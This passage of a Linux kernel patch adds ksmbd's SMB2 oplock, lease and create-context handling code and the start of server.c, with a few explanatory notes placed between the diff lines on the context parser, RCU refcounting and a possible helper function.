++	if (prev_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
++	    prev_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		opinfo_conn_put(prev_opinfo);
++		goto op_break_not_needed;
++	}
++
++	list_add(&work->interim_entry, &prev_opinfo->interim_list);
++	err = oplock_break(prev_opinfo, SMB2_OPLOCK_LEVEL_II);
++	opinfo_conn_put(prev_opinfo);
++	if (err == -ENOENT)
++		goto set_lev;
++	/* -ENOENT means the oplock was already freed by a close */
++	else if (err < 0)
++		goto err_out;
++
++op_break_not_needed:
++	if (share_ret < 0) {
++		err = share_ret;
++		goto err_out;
++	}
++
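++	/* Other opens already exist, so at most level II can be granted. */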
++	if (req_op_level != SMB2_OPLOCK_LEVEL_NONE)
++		req_op_level = SMB2_OPLOCK_LEVEL_II;
++
++	/* grant a fixed oplock when a lease and a plain oplock are stacked on the same file */
++	if (prev_op_has_lease && !lctx)
++		if (prev_op_state & SMB2_LEASE_HANDLE_CACHING_LE)
++			req_op_level = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (!prev_op_has_lease && lctx) {
++		req_op_level = SMB2_OPLOCK_LEVEL_II;
++		lctx->req_state = SMB2_LEASE_READ_CACHING_LE;
++	}
++
++set_lev:
++	set_oplock_level(opinfo, req_op_level, lctx);
++
++out:
++	rcu_assign_pointer(fp->f_opinfo, opinfo);
++	opinfo->o_fp = fp;
++
++	opinfo_count_inc(fp);
++	opinfo_add(opinfo);
++	if (opinfo->is_lease) {
++		err = add_lease_global_list(opinfo);
++		if (err)
++			goto err_out;
++	}
++
++	return 0;
++err_out:
++	free_opinfo(opinfo);
++	return err;
++}
++
++/**
++ * smb_break_all_write_oplock() - break batch/exclusive oplock to level2
++ * @work:	smb work
++ * @fp:		ksmbd file pointer
++ * @is_trunc:	truncate on open
++ */
++static void smb_break_all_write_oplock(struct ksmbd_work *work,
++				       struct ksmbd_file *fp, int is_trunc)
++{
++	struct oplock_info *brk_opinfo;
++
++	brk_opinfo = opinfo_get_list(fp->f_ci);
++	if (!brk_opinfo)
++		return;
++	if (brk_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
++	    brk_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
++		opinfo_conn_put(brk_opinfo);
++		return;
++	}
++
++	brk_opinfo->open_trunc = is_trunc;
++	list_add(&work->interim_entry, &brk_opinfo->interim_list);
++	oplock_break(brk_opinfo, SMB2_OPLOCK_LEVEL_II);
++	opinfo_conn_put(brk_opinfo);
++}
++
++/**
++ * smb_break_all_levII_oplock() - send level2 oplock or read lease break command
++ *	from server to client
++ * @work:	smb work
++ * @fp:		ksmbd file pointer
++ * @is_trunc:	truncate on open
++ */
++void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
++				int is_trunc)
++{
++	struct oplock_info *op, *brk_op;
++	struct ksmbd_inode *ci;
++	struct ksmbd_conn *conn = work->conn;
++
++	if (!test_share_config_flag(work->tcon->share_conf,
++				    KSMBD_SHARE_FLAG_OPLOCKS))
++		return;
++
++	ci = fp->f_ci;
++	op = opinfo_get(fp);
++
++	rcu_read_lock();
++	list_for_each_entry_rcu(brk_op, &ci->m_op_list, op_entry) {
++		if (!atomic_inc_not_zero(&brk_op->refcount))
++			continue;
++
++		atomic_inc(&brk_op->conn->r_count);
++		if (ksmbd_conn_releasing(brk_op->conn)) {
++			atomic_dec(&brk_op->conn->r_count);
++			continue;
++		}
++
++		rcu_read_unlock();
++		if (brk_op->is_lease && (brk_op->o_lease->state &
++		    (~(SMB2_LEASE_READ_CACHING_LE |
++				SMB2_LEASE_HANDLE_CACHING_LE)))) {
++			ksmbd_debug(OPLOCK, "unexpected lease state(0x%x)\n",
++				    brk_op->o_lease->state);
++			goto next;
++		} else if (brk_op->level !=
++				SMB2_OPLOCK_LEVEL_II) {
++			ksmbd_debug(OPLOCK, "unexpected oplock(0x%x)\n",
++				    brk_op->level);
++			goto next;
++		}
++
++		/* Skip an oplock that is already being broken to none */
++		if (brk_op->is_lease &&
++		    brk_op->o_lease->new_state == SMB2_LEASE_NONE_LE &&
++		    atomic_read(&brk_op->breaking_cnt))
++			goto next;
++
++		if (op && op->is_lease && brk_op->is_lease &&
++		    !memcmp(conn->ClientGUID, brk_op->conn->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE) &&
++		    !memcmp(op->o_lease->lease_key, brk_op->o_lease->lease_key,
++			    SMB2_LEASE_KEY_SIZE))
++			goto next;
++		brk_op->open_trunc = is_trunc;
++		oplock_break(brk_op, SMB2_OPLOCK_LEVEL_NONE);
++next:
++		opinfo_conn_put(brk_op);
++		rcu_read_lock();
++	}
++	rcu_read_unlock();
++
++	if (op)
++		opinfo_put(op);
++}
++
++/**
++ * smb_break_all_oplock() - break both batch/exclusive and level2 oplock
++ * @work:	smb work
++ * @fp:		ksmbd file pointer
++ */
++void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp)
++{
++	if (!test_share_config_flag(work->tcon->share_conf,
++				    KSMBD_SHARE_FLAG_OPLOCKS))
++		return;
++
++	smb_break_all_write_oplock(work, fp, 1);
++	smb_break_all_levII_oplock(work, fp, 1);
++}
++
++/**
++ * smb2_map_lease_to_oplock() - map lease state to corresponding oplock type
++ * @lease_state:     lease type
++ *
++ * Return:      0 if no mapping, otherwise corresponding oplock type
++ */
++__u8 smb2_map_lease_to_oplock(__le32 lease_state)
++{
++	if (lease_state == (SMB2_LEASE_HANDLE_CACHING_LE |
++			    SMB2_LEASE_READ_CACHING_LE |
++			    SMB2_LEASE_WRITE_CACHING_LE)) {
++		return SMB2_OPLOCK_LEVEL_BATCH;
++	} else if (lease_state != SMB2_LEASE_WRITE_CACHING_LE &&
++		 lease_state & SMB2_LEASE_WRITE_CACHING_LE) {
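++		/*
++		 * Write caching combined with read caching but without handle
++		 * caching maps to an exclusive oplock; R/W/H matched above.
++		 */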
++		if (!(lease_state & SMB2_LEASE_HANDLE_CACHING_LE))
++			return SMB2_OPLOCK_LEVEL_EXCLUSIVE;
++	} else if (lease_state & SMB2_LEASE_READ_CACHING_LE) {
++		return SMB2_OPLOCK_LEVEL_II;
++	}
++	return 0;
++}
++
++/**
++ * create_lease_buf() - create lease context for open cmd response
++ * @rbuf:	buffer to create lease context response
++ * @lease:	parsed lease state information to encode into @rbuf
++ */
++void create_lease_buf(u8 *rbuf, struct lease *lease)
++{
++	if (lease->version == 2) {
++		struct create_lease_v2 *buf = (struct create_lease_v2 *)rbuf;
++
++		memset(buf, 0, sizeof(struct create_lease_v2));
++		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
++		       SMB2_LEASE_KEY_SIZE);
++		buf->lcontext.LeaseFlags = lease->flags;
++		buf->lcontext.LeaseState = lease->state;
++		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
++		       SMB2_LEASE_KEY_SIZE);
++		buf->ccontext.DataOffset = cpu_to_le16(offsetof
++				(struct create_lease_v2, lcontext));
++		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
++		buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease_v2, Name));
++		buf->ccontext.NameLength = cpu_to_le16(4);
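++		/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */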
++		buf->Name[0] = 'R';
++		buf->Name[1] = 'q';
++		buf->Name[2] = 'L';
++		buf->Name[3] = 's';
++	} else {
++		struct create_lease *buf = (struct create_lease *)rbuf;
++
++		memset(buf, 0, sizeof(struct create_lease));
++		memcpy(buf->lcontext.LeaseKey, lease->lease_key, SMB2_LEASE_KEY_SIZE);
++		buf->lcontext.LeaseFlags = lease->flags;
++		buf->lcontext.LeaseState = lease->state;
++		buf->ccontext.DataOffset = cpu_to_le16(offsetof
++				(struct create_lease, lcontext));
++		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
++		buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_lease, Name));
++		buf->ccontext.NameLength = cpu_to_le16(4);
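++		/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */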
++		buf->Name[0] = 'R';
++		buf->Name[1] = 'q';
++		buf->Name[2] = 'L';
++		buf->Name[3] = 's';
++	}
++}
++
++/**
++ * parse_lease_state() - parse lease context contained in file open request
++ * @open_req:	buffer containing smb2 file open(create) request
++ *
++ * Return:  allocated lease context object on success, otherwise NULL
++ */
++struct lease_ctx_info *parse_lease_state(void *open_req)
++{
++	struct create_context *cc;
++	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
++	struct lease_ctx_info *lreq;
++
++	cc = smb2_find_context_vals(req, SMB2_CREATE_REQUEST_LEASE, 4);
++	if (IS_ERR_OR_NULL(cc))
++		return NULL;
++
++	lreq = kzalloc(sizeof(struct lease_ctx_info), GFP_KERNEL);
++	if (!lreq)
++		return NULL;
++
++	if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
++		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
++
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
++				SMB2_LEASE_KEY_SIZE);
++		lreq->version = 2;
++	} else {
++		struct create_lease *lc = (struct create_lease *)cc;
++
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		lreq->version = 1;
++	}
++	return lreq;
++}
++
++/**
++ * smb2_find_context_vals() - find a particular context info in open request
++ * @open_req:	buffer containing smb2 file open(create) request
++ * @tag:	context name to search for
++ * @tag_len:	the length of tag
++ *
++ * Return:	pointer to requested context, NULL if @tag context not found
++ *		or error pointer if name length is invalid.
++ */
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len)
++{
++	struct create_context *cc;
++	unsigned int next = 0;
++	char *name;
++	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
++	unsigned int remain_len, name_off, name_len, value_off, value_len,
++		     cc_len;
++
++	/*
++	 * CreateContextsOffset and CreateContextsLength are guaranteed to
++	 * be valid because of ksmbd_smb2_check_message().
++	 */
++	cc = (struct create_context *)((char *)req +
++				       le32_to_cpu(req->CreateContextsOffset));
++	remain_len = le32_to_cpu(req->CreateContextsLength);
++	do {
++		cc = (struct create_context *)((char *)cc + next);
++		if (remain_len < offsetof(struct create_context, Buffer))
++			return ERR_PTR(-EINVAL);
++
++		next = le32_to_cpu(cc->Next);
++		name_off = le16_to_cpu(cc->NameOffset);
++		name_len = le16_to_cpu(cc->NameLength);
++		value_off = le16_to_cpu(cc->DataOffset);
++		value_len = le32_to_cpu(cc->DataLength);
++		cc_len = next ? next : remain_len;
++
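++		/*
++		 * Reject malformed contexts: misaligned offsets, or name/value
++		 * ranges that fall outside this create context.
++		 */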
++		if ((next & 0x7) != 0 ||
++		    next > remain_len ||
++		    name_off != offsetof(struct create_context, Buffer) ||
++		    name_len < 4 ||
++		    name_off + name_len > cc_len ||
++		    (value_off & 0x7) != 0 ||
++		    (value_off && (value_off < name_off + name_len)) ||
++		    ((u64)value_off + value_len > cc_len))
++			return ERR_PTR(-EINVAL);
++
++		name = (char *)cc + name_off;
++		if (name_len == tag_len && !memcmp(name, tag, name_len))
++			return cc;
++
++		remain_len -= next;
++	} while (next != 0);
++
++	return NULL;
++}
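
The walker above enforces 8-byte chain alignment and offset/length bounds on
every hop, so callers only have to distinguish three outcomes: an error
pointer for a malformed chain, NULL when the tag is absent, or the matching
context. A hedged lookup sketch for another well-known tag, the durable
handle request "DHnQ" (the durable_requested variable is hypothetical):

	struct create_context *cc;
	bool durable_requested = false;

	cc = smb2_find_context_vals(req, SMB2_CREATE_DURABLE_HANDLE_REQUEST, 4);
	if (IS_ERR(cc))
		return PTR_ERR(cc);	/* malformed context chain */
	if (cc)
		durable_requested = true;	/* "DHnQ" was present */
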
++
++/**
++ * create_durable_rsp_buf() - create durable handle context
++ * @cc:	buffer to create durable context response
++ */
++void create_durable_rsp_buf(char *cc)
++{
++	struct create_durable_rsp *buf;
++
++	buf = (struct create_durable_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_durable_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Data));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE is "DHnQ" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = 'n';
++	buf->Name[3] = 'Q';
++}
++
++/**
++ * create_durable_v2_rsp_buf() - create durable handle v2 context
++ * @cc:	buffer to create durable context response
++ * @fp: ksmbd file pointer
++ */
++void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp)
++{
++	struct create_durable_v2_rsp *buf;
++
++	buf = (struct create_durable_v2_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_durable_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Data));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_durable_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2 is "DH2Q" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = '2';
++	buf->Name[3] = 'Q';
++
++	buf->Timeout = cpu_to_le32(fp->durable_timeout);
++}
++
++/**
++ * create_mxac_rsp_buf() - create query maximal access context
++ * @cc:			buffer to create maximal access context response
++ * @maximal_access:	maximal access
++ */
++void create_mxac_rsp_buf(char *cc, int maximal_access)
++{
++	struct create_mxac_rsp *buf;
++
++	buf = (struct create_mxac_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_mxac_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_mxac_rsp, QueryStatus));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_mxac_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE is "MxAc" */
++	buf->Name[0] = 'M';
++	buf->Name[1] = 'x';
++	buf->Name[2] = 'A';
++	buf->Name[3] = 'c';
++
++	buf->QueryStatus = STATUS_SUCCESS;
++	buf->MaximalAccess = cpu_to_le32(maximal_access);
++}
++
++void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id)
++{
++	struct create_disk_id_rsp *buf;
++
++	buf = (struct create_disk_id_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_disk_id_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_disk_id_rsp, DiskFileId));
++	buf->ccontext.DataLength = cpu_to_le32(32);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_mxac_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_QUERY_ON_DISK_ID_RESPONSE is "QFid" */
++	buf->Name[0] = 'Q';
++	buf->Name[1] = 'F';
++	buf->Name[2] = 'i';
++	buf->Name[3] = 'd';
++
++	buf->DiskFileId = cpu_to_le64(file_id);
++	buf->VolumeId = cpu_to_le64(vol_id);
++}
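
The response builders above all repeat the same ccontext header fill: payload
offset and length, name offset, and a 4-byte tag. A hypothetical helper, not
part of this patch, that factors the pattern out; it relies on the ccontext
being the first member of each response struct, so offsets relative to that
struct can be applied to cc directly:

	static void fill_ccontext_hdr(struct create_context *cc, u16 data_off,
				      u32 data_len, u16 name_off,
				      const char name[4])
	{
		cc->DataOffset = cpu_to_le16(data_off);
		cc->DataLength = cpu_to_le32(data_len);
		cc->NameOffset = cpu_to_le16(name_off);
		cc->NameLength = cpu_to_le16(4);
		memcpy((char *)cc + name_off, name, 4);	/* 4-byte tag, e.g. "MxAc" */
	}

With it, create_mxac_rsp_buf() would reduce to one fill_ccontext_hdr() call
plus the QueryStatus/MaximalAccess assignments.
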
++
++/**
++ * create_posix_rsp_buf() - create posix extension context
++ * @cc:	buffer to create the posix context response
++ * @fp: ksmbd file pointer
++ */
++void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp)
++{
++	struct create_posix_rsp *buf;
++	struct inode *inode = file_inode(fp->filp);
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
++	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
++
++	buf = (struct create_posix_rsp *)cc;
++	memset(buf, 0, sizeof(struct create_posix_rsp));
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++			(struct create_posix_rsp, nlink));
++	/*
++	 * DataLength = nlink(4) + reparse_tag(4) + mode(4) +
++	 * domain sid(28) + unix group sid(16).
++	 */
++	buf->ccontext.DataLength = cpu_to_le32(56);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++			(struct create_posix_rsp, Name));
++	buf->ccontext.NameLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	buf->Name[0] = 0x93;
++	buf->Name[1] = 0xAD;
++	buf->Name[2] = 0x25;
++	buf->Name[3] = 0x50;
++	buf->Name[4] = 0x9C;
++	buf->Name[5] = 0xB4;
++	buf->Name[6] = 0x11;
++	buf->Name[7] = 0xE7;
++	buf->Name[8] = 0xB4;
++	buf->Name[9] = 0x23;
++	buf->Name[10] = 0x83;
++	buf->Name[11] = 0xDE;
++	buf->Name[12] = 0x96;
++	buf->Name[13] = 0x8B;
++	buf->Name[14] = 0xCD;
++	buf->Name[15] = 0x7C;
++
++	buf->nlink = cpu_to_le32(inode->i_nlink);
++	buf->reparse_tag = cpu_to_le32(fp->volatile_id);
++	buf->mode = cpu_to_le32(inode->i_mode & 0777);
++	/*
++	 * SidBuffer(44) contains two sids (Domain sid(28), UNIX group sid(16)).
++	 * Domain sid(28) = revision(1) + num_subauth(1) + authority(6) +
++	 *		    sub_auth(4 * 4(num_subauth)) + RID(4).
++	 * UNIX group id(16) = revision(1) + num_subauth(1) + authority(6) +
++	 *		       sub_auth(4 * 1(num_subauth)) + RID(4).
++	 */
++	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
++		  SIDOWNER, (struct smb_sid *)&buf->SidBuffer[0]);
++	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
++		  SIDUNIX_GROUP, (struct smb_sid *)&buf->SidBuffer[28]);
++}
++
++/*
++ * Find lease object(opinfo) for given lease key/fid from lease
++ * break/file close path.
++ */
++/**
++ * lookup_lease_in_table() - find a matching lease info object
++ * @conn:	connection instance
++ * @lease_key:	lease key to be searched for
++ *
++ * Return:      the matching opinfo if found, otherwise NULL
++ */
++struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
++					  char *lease_key)
++{
++	struct oplock_info *opinfo = NULL, *ret_op = NULL;
++	struct lease_table *lt;
++	int ret;
++
++	read_lock(&lease_list_lock);
++	list_for_each_entry(lt, &lease_table_list, l_entry) {
++		if (!memcmp(lt->client_guid, conn->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE))
++			goto found;
++	}
++
++	read_unlock(&lease_list_lock);
++	return NULL;
++
++found:
++	rcu_read_lock();
++	list_for_each_entry_rcu(opinfo, &lt->lease_list, lease_entry) {
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			continue;
++		rcu_read_unlock();
++		if (!opinfo->op_state || opinfo->op_state == OPLOCK_CLOSING)
++			goto op_next;
++		if (!(opinfo->o_lease->state &
++		      (SMB2_LEASE_HANDLE_CACHING_LE |
++		       SMB2_LEASE_WRITE_CACHING_LE)))
++			goto op_next;
++		ret = compare_guid_key(opinfo, conn->ClientGUID,
++				       lease_key);
++		if (ret) {
++			ksmbd_debug(OPLOCK, "found opinfo\n");
++			ret_op = opinfo;
++			goto out;
++		}
++op_next:
++		opinfo_put(opinfo);
++		rcu_read_lock();
++	}
++	rcu_read_unlock();
++
++out:
++	read_unlock(&lease_list_lock);
++	return ret_op;
++}
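
The loop above is an instance of a common RCU-plus-refcount pattern: pin the
object with atomic_inc_not_zero() before leaving the RCU section, do the
possibly sleeping work, then drop the reference and re-enter RCU before
advancing. A generic sketch with hypothetical names; the list cursor stays
usable across the gap because the put path frees through an RCU grace period
(see the rcu_head in oplock_info in the header below):

	rcu_read_lock();
	list_for_each_entry_rcu(obj, &head, entry) {
		if (!atomic_inc_not_zero(&obj->refcount))
			continue;	/* object is being freed; skip it */
		rcu_read_unlock();	/* safe: we now hold a reference */

		inspect(obj);		/* may sleep */

		obj_put(obj);		/* may schedule an RCU-deferred free */
		rcu_read_lock();	/* re-enter before the next hop */
	}
	rcu_read_unlock();
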
+diff --git a/fs/smb/server/oplock.h b/fs/smb/server/oplock.h
+new file mode 100644
+index 0000000000000..4b0fe6da76940
+--- /dev/null
++++ b/fs/smb/server/oplock.h
+@@ -0,0 +1,127 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_OPLOCK_H
++#define __KSMBD_OPLOCK_H
++
++#include "smb_common.h"
++
++#define OPLOCK_WAIT_TIME	(35 * HZ)
++
++/* SMB2 Oplock levels */
++#define SMB2_OPLOCK_LEVEL_NONE          0x00
++#define SMB2_OPLOCK_LEVEL_II            0x01
++#define SMB2_OPLOCK_LEVEL_EXCLUSIVE     0x08
++#define SMB2_OPLOCK_LEVEL_BATCH         0x09
++#define SMB2_OPLOCK_LEVEL_LEASE         0xFF
++
++/* Oplock states */
++#define OPLOCK_STATE_NONE	0x00
++#define OPLOCK_ACK_WAIT		0x01
++#define OPLOCK_CLOSING		0x02
++
++#define OPLOCK_WRITE_TO_READ		0x01
++#define OPLOCK_READ_HANDLE_TO_READ	0x02
++#define OPLOCK_WRITE_TO_NONE		0x04
++#define OPLOCK_READ_TO_NONE		0x08
++
++struct lease_ctx_info {
++	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
++	__le32			req_state;
++	__le32			flags;
++	__le64			duration;
++	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
++	int			version;
++};
++
++struct lease_table {
++	char			client_guid[SMB2_CLIENT_GUID_SIZE];
++	struct list_head	lease_list;
++	struct list_head	l_entry;
++	spinlock_t		lb_lock;
++};
++
++struct lease {
++	__u8			lease_key[SMB2_LEASE_KEY_SIZE];
++	__le32			state;
++	__le32			new_state;
++	__le32			flags;
++	__le64			duration;
++	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
++	int			version;
++	unsigned short		epoch;
++	struct lease_table	*l_lb;
++};
++
++struct oplock_info {
++	struct ksmbd_conn	*conn;
++	struct ksmbd_session	*sess;
++	struct ksmbd_work	*work;
++	struct ksmbd_file	*o_fp;
++	int                     level;
++	int                     op_state;
++	unsigned long		pending_break;
++	u64			fid;
++	atomic_t		breaking_cnt;
++	atomic_t		refcount;
++	__u16                   Tid;
++	bool			is_lease;
++	bool			open_trunc;	/* truncate on open */
++	struct lease		*o_lease;
++	struct list_head        interim_list;
++	struct list_head        op_entry;
++	struct list_head        lease_entry;
++	wait_queue_head_t oplock_q; /* Other server threads */
++	wait_queue_head_t oplock_brk; /* oplock breaking wait */
++	struct rcu_head		rcu_head;
++};
++
++struct lease_break_info {
++	__le32			curr_state;
++	__le32			new_state;
++	__le16			epoch;
++	char			lease_key[SMB2_LEASE_KEY_SIZE];
++};
++
++struct oplock_break_info {
++	int level;
++	int open_trunc;
++	int fid;
++};
++
++int smb_grant_oplock(struct ksmbd_work *work, int req_op_level,
++		     u64 pid, struct ksmbd_file *fp, __u16 tid,
++		     struct lease_ctx_info *lctx, int share_ret);
++void smb_break_all_levII_oplock(struct ksmbd_work *work,
++				struct ksmbd_file *fp, int is_trunc);
++int opinfo_write_to_read(struct oplock_info *opinfo);
++int opinfo_read_handle_to_read(struct oplock_info *opinfo);
++int opinfo_write_to_none(struct oplock_info *opinfo);
++int opinfo_read_to_none(struct oplock_info *opinfo);
++void close_id_del_oplock(struct ksmbd_file *fp);
++void smb_break_all_oplock(struct ksmbd_work *work, struct ksmbd_file *fp);
++struct oplock_info *opinfo_get(struct ksmbd_file *fp);
++void opinfo_put(struct oplock_info *opinfo);
++
++/* Lease related functions */
++void create_lease_buf(u8 *rbuf, struct lease *lease);
++struct lease_ctx_info *parse_lease_state(void *open_req);
++__u8 smb2_map_lease_to_oplock(__le32 lease_state);
++int lease_read_to_write(struct oplock_info *opinfo);
++
++/* Durable related functions */
++void create_durable_rsp_buf(char *cc);
++void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp);
++void create_mxac_rsp_buf(char *cc, int maximal_access);
++void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id);
++void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp);
++struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len);
++struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
++					  char *lease_key);
++int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
++			struct lease_ctx_info *lctx);
++void destroy_lease_table(struct ksmbd_conn *conn);
++#endif /* __KSMBD_OPLOCK_H */
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+new file mode 100644
+index 0000000000000..847ee62afb8a1
+--- /dev/null
++++ b/fs/smb/server/server.c
+@@ -0,0 +1,646 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include "glob.h"
++#include "oplock.h"
++#include "misc.h"
++#include <linux/sched/signal.h>
++#include <linux/workqueue.h>
++#include <linux/sysfs.h>
++#include <linux/module.h>
++#include <linux/moduleparam.h>
++
++#include "server.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "connection.h"
++#include "transport_ipc.h"
++#include "mgmt/user_session.h"
++#include "crypto_ctx.h"
++#include "auth.h"
++
++int ksmbd_debug_types;
++
++struct ksmbd_server_config server_conf;
++
++enum SERVER_CTRL_TYPE {
++	SERVER_CTRL_TYPE_INIT,
++	SERVER_CTRL_TYPE_RESET,
++};
++
++struct server_ctrl_struct {
++	int			type;
++	struct work_struct	ctrl_work;
++};
++
++static DEFINE_MUTEX(ctrl_lock);
++
++static int ___server_conf_set(int idx, char *val)
++{
++	if (idx >= ARRAY_SIZE(server_conf.conf))
++		return -EINVAL;
++
++	if (!val || val[0] == 0x00)
++		return -EINVAL;
++
++	kfree(server_conf.conf[idx]);
++	server_conf.conf[idx] = kstrdup(val, GFP_KERNEL);
++	if (!server_conf.conf[idx])
++		return -ENOMEM;
++	return 0;
++}
++
++int ksmbd_set_netbios_name(char *v)
++{
++	return ___server_conf_set(SERVER_CONF_NETBIOS_NAME, v);
++}
++
++int ksmbd_set_server_string(char *v)
++{
++	return ___server_conf_set(SERVER_CONF_SERVER_STRING, v);
++}
++
++int ksmbd_set_work_group(char *v)
++{
++	return ___server_conf_set(SERVER_CONF_WORK_GROUP, v);
++}
++
++char *ksmbd_netbios_name(void)
++{
++	return server_conf.conf[SERVER_CONF_NETBIOS_NAME];
++}
++
++char *ksmbd_server_string(void)
++{
++	return server_conf.conf[SERVER_CONF_SERVER_STRING];
++}
++
++char *ksmbd_work_group(void)
++{
++	return server_conf.conf[SERVER_CONF_WORK_GROUP];
++}
++
++/**
++ * check_conn_state() - check state of server thread connection
++ * @work:     smb work containing server thread information
++ *
++ * Return:	0 on valid connection, otherwise 1 to reconnect
++ */
++static inline int check_conn_state(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr;
++
++	if (ksmbd_conn_exiting(work->conn) ||
++	    ksmbd_conn_need_reconnect(work->conn)) {
++		rsp_hdr = work->response_buf;
++		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
++		return 1;
++	}
++	return 0;
++}
++
++#define SERVER_HANDLER_CONTINUE		0
++#define SERVER_HANDLER_ABORT		1
++
++static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
++			     u16 *cmd)
++{
++	struct smb_version_cmds *cmds;
++	u16 command;
++	int ret;
++
++	if (check_conn_state(work))
++		return SERVER_HANDLER_CONTINUE;
++
++	if (ksmbd_verify_smb_message(work))
++		return SERVER_HANDLER_ABORT;
++
++	command = conn->ops->get_cmd_val(work);
++	*cmd = command;
++
++andx_again:
++	if (command >= conn->max_cmds) {
++		conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
++		return SERVER_HANDLER_CONTINUE;
++	}
++
++	cmds = &conn->cmds[command];
++	if (!cmds->proc) {
++		ksmbd_debug(SMB, "*** not implemented yet cmd = %x\n", command);
++		conn->ops->set_rsp_status(work, STATUS_NOT_IMPLEMENTED);
++		return SERVER_HANDLER_CONTINUE;
++	}
++
++	if (work->sess && conn->ops->is_sign_req(work, command)) {
